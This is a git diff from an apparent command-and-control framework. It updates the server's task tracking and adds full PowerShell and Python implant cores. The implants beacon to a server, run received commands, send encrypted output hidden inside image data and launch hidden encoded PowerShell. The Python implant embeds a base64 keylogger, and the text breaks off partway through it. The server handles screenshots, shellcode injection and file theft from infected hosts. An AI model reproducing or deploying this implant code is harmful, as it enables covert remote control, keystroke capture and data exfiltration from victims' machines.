diff --git a/C2Server.py b/C2Server.py index c6269f4..6b79768 100644 --- a/C2Server.py +++ b/C2Server.py @@ -226,7 +226,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): cookieVal = (s.cookieHeader).replace("SessionID=","") post_data = s.rfile.read(content_length) logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(s.path), str(s.headers), post_data) - now = datetime.datetime.now() result = get_implants_all() for i in result: @@ -239,6 +238,18 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): if RandomURI in s.path and cookieVal: update_implant_lastseen(now.strftime("%m/%d/%Y %H:%M:%S"),RandomURI) decCookie = decrypt(encKey, cookieVal) + if decCookie.startswith("Error"): + print (Colours.RED) + print ("The multicmd errored: ") + print (decrypt_bytes_gzip(encKey, post_data[1500:])) + print (Colours.GREEN) + s.send_response(200) + s.send_header("Content-type", "text/html") + s.end_headers() + s.wfile.write(default_response()) + return + taskId = str(int(decCookie.strip('\x00'))) + executedCmd = get_cmd_from_task_id(taskId) print (Colours.GREEN) print ("Command returned against implant %s on host %s\\%s @ %s (%s)" % (implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S"))) #print decCookie,Colours.END @@ -246,52 +257,91 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput) outputParsed = outputParsed.rstrip() - if "ModuleLoaded" in decCookie: + if "loadmodule" in executedCmd: print ("Module loaded sucessfully") - insert_completedtask(RandomURI, decCookie, "Module loaded sucessfully", "") - if "get-screenshot" in decCookie.lower() or "screencapture" in decCookie.lower(): + update_task(taskId, "Module loaded sucessfully") + if "get-screenshot" in executedCmd.lower() or "screencapture" in executedCmd.lower(): try: decoded = base64.b64decode(outputParsed) filename = i[3] + "-" + now.strftime("%m%d%Y%H%M%S_"+randomuri()) output_file = open('%s%s.png' % (DownloadsDirectory,filename), 'wb') print ("Screenshot captured: %s%s.png" % (DownloadsDirectory,filename)) - insert_completedtask(RandomURI, decCookie, "Screenshot captured: %s%s.png" % (DownloadsDirectory,filename), "") + update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory,filename)) output_file.write(decoded) output_file.close() except Exception as e: - insert_completedtask(RandomURI, decCookie, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!", "") + update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!") print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!") - elif (decCookie.lower().startswith("$shellcode64")) or (decCookie.lower().startswith("$shellcode64")): - insert_completedtask(RandomURI, decCookie, "Upload shellcode complete", "") + # What should this be now? + elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")): + update_task(taskId, "Upload shellcode complete") print ("Upload shellcode complete") - elif (decCookie.lower().startswith("run-exe core.program core inject-shellcode")): - insert_completedtask(RandomURI, decCookie, "Upload shellcode complete", "") + elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")): + update_task(taskId, "Upload shellcode complete") print (outputParsed) - elif "download-file" in decCookie.lower(): + elif "download-file" in executedCmd.lower(): try: rawoutput = decrypt_bytes_gzip(encKey, (post_data[1500:])) - filename = decCookie.lower().replace("download-file ","") + filename = executedCmd.lower().replace("download-file ","") + filename = filename.replace("-source ","") filename = filename.replace("..","") + filename = filename.replace("'","") + filename = filename.replace('"',"") filename = filename.rsplit('/', 1)[-1] filename = filename.rsplit('\\', 1)[-1] filename = filename.rstrip('\x00') - chunkNumber = rawoutput[:5] - totalChunks = rawoutput[5:10] - print ("Download file part %s of %s : %s" % (chunkNumber,totalChunks,filename)) - insert_completedtask(RandomURI, decCookie, "Download file part %s of %s : %s" % (chunkNumber,totalChunks,filename), "") - output_file = open('%s/downloads/%s' % (ROOTDIR,filename), 'a') - output_file.write(rawoutput[10:]) - output_file.close() + original_filename = filename + if rawoutput.startswith("Error"): + print("Error downloading file: ") + print rawoutput + else: + chunkNumber = rawoutput[:5] + totalChunks = rawoutput[5:10] + if (chunkNumber == "00001") and os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename)): + counter = 1 + while(os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename))): + if '.' in filename: + filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):] + else: + filename = original_filename + '-' + str(counter) + counter+=1 + if (chunkNumber != "00001"): + counter = 1 + if not os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename)): + print("Error trying to download part of a file to a file that does not exist: %s" % filename) + while(os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename))): + # First find the 'next' file would be downloaded to + if '.' in filename: + filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):] + else: + filename = original_filename + '-' + str(counter) + counter+=1 + if counter != 2: + # Then actually set the filename to this file - 1 unless it's the first one and exists without a counter + if '.' in filename: + filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):] + else: + filename = original_filename + '-' + str(counter) + else: + filename = original_filename + print ("Download file part %s of %s to: %s" % (chunkNumber,totalChunks,filename)) + update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber,totalChunks,filename)) + output_file = open('%s/downloads/%s' % (ROOTDIR,filename), 'a') + output_file.write(rawoutput[10:]) + output_file.close() except Exception as e: - insert_completedtask(RandomURI, decCookie, "Error downloading file %s " % e, "") + update_task(taskId, "Error downloading file %s " % e) print ("Error downloading file %s " % e) else: - insert_completedtask(RandomURI, decCookie, outputParsed, "") + update_task(taskId, outputParsed) print (Colours.GREEN) print (outputParsed + Colours.END) except Exception as e: e = "" + # print e + # traceback.print_exc() + finally: s.send_response(200) s.send_header("Content-type", "text/html") diff --git a/C2Viewer.py b/C2Viewer.py index ba7f092..628761e 100644 --- a/C2Viewer.py +++ b/C2Viewer.py @@ -23,7 +23,7 @@ print (logopic) print (Colours.END + "") try: - taskid = get_seqcount("CompletedTasks") + 1 + taskid = get_seqcount("Tasks") + 1 except Exception as e: user = "None" taskid = 1 @@ -64,7 +64,7 @@ while(1): user = "None" try: - completedtask = get_completedtasksbyid(taskid) + completedtask = get_tasksbyid(taskid) hostinfo = get_hostinfo(completedtask[2]) now = datetime.datetime.now() if hostinfo: diff --git a/DB.py b/DB.py index 8d6b021..283a0e9 100644 --- a/DB.py +++ b/DB.py @@ -30,15 +30,16 @@ def initializedb(): TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, Task TEXT);""" - create_completedtasks = """CREATE TABLE CompletedTasks ( - CompletedTaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, - TaskID TEXT, + create_tasks = """CREATE TABLE Tasks ( + TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, RandomURI TEXT, Command TEXT, Output TEXT, - Prompt TEXT);""" + User TEXT, + SentTime TEXT, + CompletedTime TEXT);""" - create_tasks = """CREATE TABLE NewTasks ( + create_newtasks = """CREATE TABLE NewTasks ( TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, RandomURI TEXT, Command TEXT);""" @@ -97,8 +98,8 @@ def initializedb(): if conn is not None: c.execute(create_implants) c.execute(create_autoruns) - c.execute(create_completedtasks) c.execute(create_tasks) + c.execute(create_newtasks) c.execute(create_creds) c.execute(create_urls) c.execute(create_c2server) @@ -365,15 +366,29 @@ def new_implant(RandomURI, User, Hostname, IpAddress, Key, FirstSeen, LastSeen, c.execute("INSERT INTO Implants (RandomURI, User, Hostname, IpAddress, Key, FirstSeen, LastSeen, PID, Proxy, Arch, Domain, Alive, Sleep, ModsLoaded, Pivot, Label) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (RandomURI, User, Hostname, IpAddress, Key, FirstSeen, LastSeen, PID, Proxy, Arch, Domain, Alive, Sleep, ModsLoaded, Pivot, Label)) conn.commit() -def insert_completedtask(randomuri, command, output, prompt): +def insert_task(randomuri, command, user): now = datetime.datetime.now() - TaskID = now.strftime("%m/%d/%Y %H:%M:%S") + sent_time = now.strftime("%m/%d/%Y %H:%M:%S") conn = sqlite3.connect(DB) conn.text_factory = str conn.row_factory = sqlite3.Row c = conn.cursor() - c.execute("INSERT INTO CompletedTasks (TaskID, RandomURI, Command, Output, Prompt) VALUES (?, ?, ?, ?, ?)", (TaskID, randomuri, command, output, prompt)) + if user is None: + user = "" + c.execute("INSERT INTO Tasks (RandomURI, Command, Output, User, SentTime, CompletedTime) VALUES (?, ?, ?, ?, ?, ?)", (randomuri, command, "", user, sent_time, "")) conn.commit() + return c.lastrowid + +def update_task(taskId, output): + now = datetime.datetime.now() + completedTime = now.strftime("%m/%d/%Y %H:%M:%S") + conn = sqlite3.connect(DB) + conn.text_factory = str + conn.row_factory = sqlite3.Row + c = conn.cursor() + c.execute("UPDATE Tasks SET Output=?, CompletedTime=? WHERE TaskID=%s" % taskId, (output, completedTime)) + conn.commit() + return c.lastrowid def update_item(column, table, value, wherecolumn=None, where=None): conn = sqlite3.connect(DB) @@ -395,22 +410,22 @@ def get_implantbyid(id): else: return None -def get_completedtasks(): +def get_tasks(): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row c = conn.cursor() - c.execute("SELECT * FROM CompletedTasks") + c.execute("SELECT * FROM Tasks") result = c.fetchall() if result: return result else: return None -def get_completedtasksbyid(id): +def get_tasksbyid(id): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row c = conn.cursor() - c.execute("SELECT * FROM CompletedTasks WHERE CompletedTaskID=%s" % id) + c.execute("SELECT * FROM Tasks WHERE CompletedTaskID=%s" % id) result = c.fetchone() if result: return result @@ -461,6 +476,17 @@ def get_dfheader(): else: return None +def get_cmd_from_task_id(taskId): + conn = sqlite3.connect(DB) + conn.row_factory = sqlite3.Row + c = conn.cursor() + c.execute("SELECT Command FROM Tasks WHERE TaskId=%s" % taskId) + result = str(c.fetchone()[0]) + if result: + return result + else: + return None + def get_defaultuseragent(): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row diff --git a/Files/PSImplant-Core.ps1 b/Files/PSImplant-Core.ps1 new file mode 100644 index 0000000..bf8435d --- /dev/null +++ b/Files/PSImplant-Core.ps1 @@ -0,0 +1,272 @@ +$key="%s" +$global:sleeptime = '%s' + +$payloadclear = @" +[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true} +`$s="$s" +`$sc="$sc" +function DEC {${function:DEC}} +function ENC {${function:ENC}} +function CAM {${function:CAM}} +function Get-Webclient {${function:Get-Webclient}} +function Primer {${function:primer}} +`$primer = primer +if (`$primer) {`$primer| iex} else { +start-sleep 1800 +primer | iex } +"@ + +$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear) +$CompressedStream = New-Object IO.MemoryStream +$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) +$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) +$DeflateStream.Dispose() +$CompressedScriptBytes = $CompressedStream.ToArray() +$CompressedStream.Dispose() +$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) +$NewScript = "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`"$EncodedCompressedScript`"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" +$UnicodeEncoder = New-Object System.Text.UnicodeEncoding +$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript)) +$payloadraw = "powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)" +$payload = $payloadraw -replace "`n", "" + +function GetImgData($cmdoutput) { + $icoimage = @(%s) + + try {$image = $icoimage|get-random}catch{} + + function randomgen + { + param ( + [int]$Length + ) + $set = "...................@..........................Tyscf".ToCharArray() + $result = "" + for ($x = 0; $x -lt $Length; $x++) + {$result += $set | Get-Random} + return $result + } + $imageBytes = [Convert]::FromBase64String($image) + $maxbyteslen = 1500 + $maxdatalen = 1500 + ($cmdoutput.Length) + $imagebyteslen = $imageBytes.Length + $paddingbyteslen = $maxbyteslen - $imagebyteslen + $BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen)) + $ImageBytesFull = New-Object byte[] $maxdatalen + [System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length) + [System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length) + [System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length ) + $ImageBytesFull +} +function Create-AesManagedObject($key, $IV) { + try { + $aesManaged = New-Object "System.Security.Cryptography.RijndaelManaged" + } catch { + $aesManaged = New-Object "System.Security.Cryptography.AesCryptoServiceProvider" + } + $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC + $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros + $aesManaged.BlockSize = 128 + $aesManaged.KeySize = 256 + if ($IV) { + if ($IV.getType().Name -eq "String") { + $aesManaged.IV = [System.Convert]::FromBase64String($IV) + } + else { + $aesManaged.IV = $IV + } + } + if ($key) { + if ($key.getType().Name -eq "String") { + $aesManaged.Key = [System.Convert]::FromBase64String($key) + } + else { + $aesManaged.Key = $key + } + } + $aesManaged +} + +function Encrypt-String($key, $unencryptedString) { + $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString) + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length); + [byte[]] $fullData = $aesManaged.IV + $encryptedData + #$aesManaged.Dispose() + [System.Convert]::ToBase64String($fullData) +} +function Encrypt-Bytes($key, $bytes) { + [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream + $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress) + $gzipStream.Write( $bytes, 0, $bytes.Length ) + $gzipStream.Close() + $bytes = $output.ToArray() + $output.Close() + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) + [byte[]] $fullData = $aesManaged.IV + $encryptedData + $fullData +} +function Decrypt-String($key, $encryptedStringWithIV) { + $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV) + $IV = $bytes[0..15] + $aesManaged = Create-AesManagedObject $key $IV + $decryptor = $aesManaged.CreateDecryptor(); + $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16); + #$aesManaged.Dispose() + [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0) +} +function Encrypt-String2($key, $unencryptedString) { + $unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString) + $CompressedStream = New-Object IO.MemoryStream + $DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress) + $DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length) + $DeflateStream.Dispose() + $bytes = $CompressedStream.ToArray() + $CompressedStream.Dispose() + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) + [byte[]] $fullData = $aesManaged.IV + $encryptedData + $fullData +} +function Decrypt-String2($key, $encryptedStringWithIV) { + $bytes = $encryptedStringWithIV + $IV = $bytes[0..15] + $aesManaged = Create-AesManagedObject $key $IV + $decryptor = $aesManaged.CreateDecryptor() + $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16) + $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencryptedData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd() + $output + #[System.Text.Encoding]::UTF8.GetString($output).Trim([char]0) +} + +function Send-Response($Server, $Key, $TaskId, $Data) { + try{ + $eid = Encrypt-String $Key $TaskId + $Output = Encrypt-String2 $Key $Data + $UploadBytes = getimgdata $Output + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null + } catch { + Write-Host "ErrorResponse: " + $error[0] + } +} + +[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} + +$URI= "%s" +$Server = "$s/%s" +$ServerClean = "$sc" +while($true) +{ + $ServerURLS = "$($ServerClean)","$($ServerClean)" + $date = (Get-Date -Format "dd/MM/yyyy") + $date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null) + $killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null) + if ($killdate -lt $date) {exit} + $sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9) + $newsleep = $sleeptimeran|get-random + if ($newsleep -lt 1) {$newsleep = 5} + start-sleep $newsleep + $URLS = %s + $RandomURI = Get-Random $URLS + $ServerClean = Get-Random $ServerURLS + $G=[guid]::NewGuid() + $Server = "$ServerClean/$RandomURI$G/?$URI" + try { $ReadCommand = (Get-Webclient).DownloadString("$Server") } catch {} + + while($ReadCommand) { + $RandomURI = Get-Random $URLS + $ServerClean = Get-Random $ServerURLS + $G=[guid]::NewGuid() + $Server = "$ServerClean/$RandomURI$G/?$URI" + try { $ReadCommandClear = Decrypt-String $key $ReadCommand } catch {} + $error.clear() + try { + if (($ReadCommandClear) -and ($ReadCommandClear -ne "fvdsghfdsyyh")) { + if ($ReadCommandClear.ToLower().StartsWith("multicmd")) { + $splitcmd = $ReadCommandClear -replace "multicmd","" + $split = $splitcmd -split "!d-3dion@LD!-d" + foreach ($i in $split){ + $id = New-Object System.String($i, 0, 5) + $c = New-Object System.String($i, 5, ($i.Length - 5)) + $i = $c + $RandomURI = Get-Random $URLS + $ServerClean = Get-Random $ServerURLS + $G=[guid]::NewGuid() + $Server = "$ServerClean/$RandomURI$G/?$URI" + $error.clear() + if ($i.ToLower().StartsWith("upload-file")) { + try { + $Output = Invoke-Expression $i | out-string + $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" + if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } # $result doesn't appear to be used anywhere? + } catch { + $Output = "ErrorUpload: " + $error[0] + } + Send-Response $Server $key $id $Output + } elseif ($i.ToLower().StartsWith("download-file")) { + try { + $i = $i + " -taskid " + $id + Invoke-Expression $i | Out-Null + } + catch { + $Output = "ErrorDownload: " + $error[0] + Send-Response $Server $key $id $Output + } + } elseif ($i.ToLower().StartsWith("loadmodule")) { + try { + $modulename = $i -replace "LoadModule","" + $Output = Invoke-Expression $modulename | out-string + $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" + } catch { + $Output = "ErrorLoadMod: " + $error[0] + } + Send-Response $Server $key $id $Output + } elseif ($i.ToLower().StartsWith("get-screenshotallwindows")) { + try { + $i = $i + " -taskid " + $id + Invoke-Expression $i | Out-Null + } + catch { + $Output = "ErrorScreenshotAllWindows: " + $error[0] + Send-Response $Server $key $id $Output + } + } elseif ($i.ToLower().StartsWith("get-webpage")) { + try { + $i = $i + " -taskid " + $id + Invoke-Expression $i | Out-Null + } + catch { + $Output = "ErrorGetWebpage: " + $error[0] + Send-Response $Server $key $id $Output + } + }else { + try { + $Output = Invoke-Expression $i | out-string + $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" + $StdError = ($error[0] | Out-String) + if ($StdError){ + $Output = $Output + $StdError + $error.clear() + } + } catch { + $Output = "ErrorCmd: " + $error[0] + } + Send-Response $Server $key $id $Output + } + } + } + + $ReadCommandClear = $null + $ReadCommand = $null + } + } catch { + $message = $_.Exception.Message + Send-Response $Server $key "Error" $message + } + break + } +} \ No newline at end of file diff --git a/Files/PyImplant-Core.py b/Files/PyImplant-Core.py new file mode 100644 index 0000000..deb3a3c --- /dev/null +++ b/Files/PyImplant-Core.py @@ -0,0 +1,215 @@ +import urllib2, os, subprocess, re, datetime, time, base64, string, random +hh = '%s' +timer = %s +icoimage = [%s] +urls = [%s] +kd=time.strptime("%s","%%d/%%m/%%Y") +useragent = "" +imbase = "%s" + +def keylog(): + # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py + import os,time,base64,subprocess,uuid + filename = "/tmp/%%s" %% uuid.uuid4().hex + b64logger = "aW1wb3J0IG9zLHRpbWUKZmlsZW5hbWUgPSAiUkVQTEFDRU1FIgpvdXRwdXQgPSBvcy5wb3BlbignZWNobyAicmVxdWlyZSBcJ2Jhc2U2NFwnO2V2YWwoQmFzZTY0LmRlY29kZTY0KFwnWkdWbUlISjFZbmxmTVY4NVgyOXlYMmhwWjJobGNqOE5DaUFnVWxWQ1dWOVdSVkpUU1U5T0xuUnZYMllnUGowZ01TNDVJQ1ltSUZKVlFsbGZWa1ZTVTBsUFRpNTBiMTltUERJdU13MEtaVzVrRFFwa1pXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNCU1ZVSlpYMVpGVWxOSlQwNHVkRzlmWmlBK1BTQXlMak1OQ21WdVpBMEtjbVZ4ZFdseVpTQW5kR2h5WldGa0p3MEtjbVZ4ZFdseVpTQW5abWxrWkd4bEp5QnBaaUJ5ZFdKNVh6SmZNMTl2Y2w5b2FXZG9aWEkvRFFweVpYRjFhWEpsSUNkbWFXUmtiR1V2YVcxd2IzSjBKeUJwWmlCeWRXSjVYekpmTTE5dmNsOW9hV2RvWlhJL0RRcHlaWEYxYVhKbElDZGtiQ2NnYVdZZ2JtOTBJSEoxWW5sZk1sOHpYMjl5WDJocFoyaGxjajhOQ25KbGNYVnBjbVVnSjJSc0wybHRjRzl5ZENjZ2FXWWdibTkwSUhKMVlubGZNbDh6WDI5eVgyaHBaMmhsY2o4TkNrbHRjRzl5ZEdWeUlEMGdhV1lnWkdWbWFXNWxaRDhvUkV3Nk9rbHRjRzl5ZEdWeUtTQjBhR1Z1SUdWNGRHVnVaQ0JFVERvNlNXMXdiM0owWlhJZ1pXeHphV1lnWkdWbWFXNWxaRDhvUm1sa1pHeGxPanBKYlhCdmNuUmxjaWtnZEdobGJpQmxlSFJsYm1RZ1JtbGtaR3hsT2pwSmJYQnZjblJsY2lCbGJITmxJRVJNT2pwSmJYQnZjblJoWW14bElHVnVaQTBLWkdWbUlHMWhiR3h2WTNNb2MybDZaU2tOQ2lBZ2FXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNBZ0lFWnBaR1JzWlRvNlVHOXBiblJsY2k1dFlXeHNiMk1vYzJsNlpTa05DaUFnWld4emFXWWdjblZpZVY4eFh6bGZiM0pmYUdsbmFHVnlQeUFOQ2lBZ0lDQkVURG82UTFCMGNpNXRZV3hzYjJNb2MybDZaU2tOQ2lBZ1pXeHpaUTBLSUNBZ0lFUk1PanB0WVd4c2IyTW9jMmw2WlNrTkNpQWdaVzVrRFFwbGJtUU5DbWxtSUc1dmRDQnlkV0o1WHpGZk9WOXZjbDlvYVdkb1pYSS9EUW9nSUcxdlpIVnNaU0JFVEEwS0lDQWdJRzF2WkhWc1pTQkpiWEJ2Y25SaFlteGxEUW9nSUNBZ0lDQmtaV1lnYldWMGFHOWtYMjFwYzNOcGJtY29iV1YwYUN3Z0ttRnlaM01zSUNaaWJHOWpheWtOQ2lBZ0lDQWdJQ0FnYzNSeUlEMGdiV1YwYUM1MGIxOXpEUW9nSUNBZ0lDQWdJR3h2ZDJWeUlEMGdjM1J5V3pBc01WMHVaRzkzYm1OaGMyVWdLeUJ6ZEhKYk1TNHVMVEZkRFFvZ0lDQWdJQ0FnSUdsbUlITmxiR1l1Y21WemNHOXVaRjkwYno4Z2JHOTNaWElOQ2lBZ0lDQWdJQ0FnSUNCelpXeG1Mbk5sYm1RZ2JHOTNaWElzSUNwaGNtZHpEUW9nSUNBZ0lDQWdJR1ZzYzJVTkNpQWdJQ0FnSUNBZ0lDQnpkWEJsY2cwS0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lHVnVaQTBLSUNBZ0lHVnVaQTBLSUNCbGJtUU5DbVZ1WkEwS1UwMWZTME5JVWw5RFFVTklSU0E5SURNNERRcFRUVjlEVlZKU1JVNVVYMU5EVWtsUVZDQTlJQzB5RFFwTlFWaGZRVkJRWDA1QlRVVWdQU0E0TUEwS2JXOWtkV3hsSUVOaGNtSnZiZzBLSUNCcFppQnlkV0o1WHpKZk0xOXZjbDlvYVdkb1pYSS9EUW9nSUNBZ1pYaDBaVzVrSUVacFpHUnNaVG82U1cxd2IzSjBaWElOQ2lBZ1pXeHpaUTBLSUNBZ0lHVjRkR1Z1WkNCRVREbzZTVzF3YjNKMFpYSU5DaUFnWlc1a0RRb2dJR1JzYkc5aFpDQW5MMU41YzNSbGJTOU1hV0p5WVhKNUwwWnlZVzFsZDI5eWEzTXZRMkZ5WW05dUxtWnlZVzFsZDI5eWF5OURZWEppYjI0bkRRb2dJR1Y0ZEdWeWJpQW5kVzV6YVdkdVpXUWdiRzl1WnlCRGIzQjVVSEp2WTJWemMwNWhiV1VvWTI5dWMzUWdVSEp2WTJWemMxTmxjbWxoYkU1MWJXSmxjaUFxTENCMmIybGtJQ29wSncwS0lDQmxlSFJsY200Z0ozWnZhV1FnUjJWMFJuSnZiblJRY205alpYTnpLRkJ5YjJObGMzTlRaWEpwWVd4T2RXMWlaWElnS2lrbkRRb2dJR1Y0ZEdWeWJpQW5kbTlwWkNCSFpYUkxaWGx6S0hadmFXUWdLaWtuRFFvZ0lHVjRkR1Z5YmlBbmRXNXphV2R1WldRZ1kyaGhjaUFxUjJWMFUyTnlhWEIwVm1GeWFXRmliR1VvYVc1MExDQnBiblFwSncwS0lDQmxlSFJsY200Z0ozVnVjMmxuYm1Wa0lHTm9ZWElnUzJWNVZISmhibk5zWVhSbEtIWnZhV1FnS2l3Z2FXNTBMQ0IyYjJsa0lDb3BKdzBLSUNCbGVIUmxjbTRnSjNWdWMybG5ibVZrSUdOb1lYSWdRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LSFp2YVdRZ0tpd2dkbTlwWkNBcUxDQnBiblFzSUdsdWRDa25EUW9nSUdWNGRHVnliaUFuYVc1MElFTkdVM1J5YVc1blIyVjBUR1Z1WjNSb0tIWnZhV1FnS2lrbkRRcGxibVFOQ25CemJpQTlJRzFoYkd4dlkzTW9NVFlwRFFwdVlXMWxJRDBnYldGc2JHOWpjeWd4TmlrTkNtNWhiV1ZmWTNOMGNpQTlJRzFoYkd4dlkzTW9UVUZZWDBGUVVGOU9RVTFGS1EwS2EyVjViV0Z3SUQwZ2JXRnNiRzlqY3lneE5pa05Dbk4wWVhSbElEMGdiV0ZzYkc5amN5ZzRLUTBLYVhSMlgzTjBZWEowSUQwZ1ZHbHRaUzV1YjNjdWRHOWZhUTBLY0hKbGRsOWtiM2R1SUQwZ1NHRnphQzV1Wlhjb1ptRnNjMlVwRFFwc1lYTjBWMmx1Wkc5M0lEMGdJaUlOQ25kb2FXeGxJQ2gwY25WbEtTQmtidzBLSUNCRFlYSmliMjR1UjJWMFJuSnZiblJRY205alpYTnpLSEJ6Ymk1eVpXWXBEUW9nSUVOaGNtSnZiaTVEYjNCNVVISnZZMlZ6YzA1aGJXVW9jSE51TG5KbFppd2dibUZ0WlM1eVpXWXBEUW9nSUVOaGNtSnZiaTVIWlhSTFpYbHpLR3RsZVcxaGNDa05DaUFnYzNSeVgyeGxiaUE5SUVOaGNtSnZiaTVEUmxOMGNtbHVaMGRsZEV4bGJtZDBhQ2h1WVcxbEtRMEtJQ0JqYjNCcFpXUWdQU0JEWVhKaWIyNHVRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LRzVoYldVc0lHNWhiV1ZmWTNOMGNpd2dUVUZZWDBGUVVGOU9RVTFGTENBd2VEQTRNREF3TVRBd0tTQStJREFOQ2lBZ1lYQndYMjVoYldVZ1BTQnBaaUJqYjNCcFpXUWdkR2hsYmlCdVlXMWxYMk56ZEhJdWRHOWZjeUJsYkhObElDZFZibXR1YjNkdUp5QmxibVFOQ2lBZ1lubDBaWE1nUFNCclpYbHRZWEF1ZEc5ZmMzUnlEUW9nSUdOaGNGOW1iR0ZuSUQwZ1ptRnNjMlVOQ2lBZ1lYTmphV2tnUFNBd0RRb2dJR04wY214amFHRnlJRDBnSWlJTkNpQWdLREF1TGk0eE1qZ3BMbVZoWTJnZ1pHOGdmR3Q4RFFvZ0lDQWdhV1lnS0NoaWVYUmxjMXRyUGo0elhTNXZjbVFnUGo0Z0tHc21OeWtwSUNZZ01TQStJREFwRFFvZ0lDQWdJQ0JwWmlCdWIzUWdjSEpsZGw5a2IzZHVXMnRkRFFvZ0lDQWdJQ0FnSUdOaGMyVWdhdzBLSUNBZ0lDQWdJQ0FnSUhkb1pXNGdNellOQ2lBZ0lDQWdJQ0FnSUNBZ0lHTjBjbXhqYUdGeUlEMGdJbHRsYm5SbGNsMGlEUW9nSUNBZ0lDQWdJQ0FnZDJobGJpQTBPQTBLSUNBZ0lDQWdJQ0FnSUNBZ1kzUnliR05vWVhJZ1BTQWlXM1JoWWwwaURRb2dJQ0FnSUNBZ0lDQWdkMmhsYmlBME9RMEtJQ0FnSUNBZ0lDQWdJQ0FnWTNSeWJHTm9ZWElnUFNBaUlDSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVXhEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSm